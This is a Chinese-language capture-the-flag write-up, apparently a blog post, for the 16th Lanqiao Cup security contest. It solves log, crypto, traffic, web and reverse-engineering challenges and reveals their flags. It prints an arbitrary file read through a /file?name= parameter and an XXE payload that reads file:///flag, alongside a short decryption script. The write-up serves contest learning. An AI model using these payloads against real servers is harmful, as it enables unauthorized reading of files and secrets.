第十六届蓝桥杯网络安全部分wp

ezEvtx

打开日志文件,搜索警告

image-20250426125948864

发现敏感文件

flag{confidential.docx}

Enigma

根据加密密钥,使用cyberchef反解得到flag

image-20250426130729936

flowzip

搜索flag即可

image-20250426151821472

黑客密室逃脱

logs

用户访问了 /secret 页面,可能试图获取 d9d1c4d9e0dac1a19edf9b95695da7969aa992a8c2d09ea698676892a0c696a49ed790a095b09b949cad

secret

 大胆尝试访问服务器文件吧,也许下一个线索就藏在其中!输入/file?name=xxx ,揭开隐藏的真相。

使用burpsuit文件字典扫描,发现扫到templates文件出现报错

http://eci-2ze92nbl08w2xak08yeg.cloudeci1.ichunqiu.com:5000/file?name=templates

image-20250426125447134

可知后端是python,于是查看一下app.py文件

http://eci-2ze92nbl08w2xak08yeg.cloudeci1.ichunqiu.com:5000/file?name=app.py

image-20250426125559170

发现将密钥写到了hidden.txt文件里面

http://eci-2ze92nbl08w2xak08yeg.cloudeci1.ichunqiu.com:5000/file?name=hidden.txt
secret_key8964

根据加密逻辑,写脚本解密,密文在日志里面

encryption_key = 'secret_key8964'
encrypted_sensitive_info ='d9d1c4d9e0ad90d195de6a6c6761ac9dc8a792a8c5cf95a6709a6996a0c793a595d6c2a1c8dd719e99b1'
encrypted_bytes = bytearray.fromhex(encrypted_sensitive_info)
for i in range(len(encrypted_sensitive_info)//2):
    print(chr(encrypted_bytes[i]-ord(encryption_key[i %len(encryption_key)])),end='')

星际XML解析器

利用file协议,直接读取flag

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test[

<!ENTITY file SYSTEM "file:///flag">

]>

<reset><login>&file;</login><secret>Any bugs?</secret></reset>

ShadowPhases

在strcmp处下断点

image-20250426112437029

查看栈,发现flag

image-20250426153909072

flag{0fa830e7-b699-4513-8e01-51f35b0f3293}
posted @ 2025-04-26 15:46  PengSoar  阅读(203)  评论(0)    收藏  举报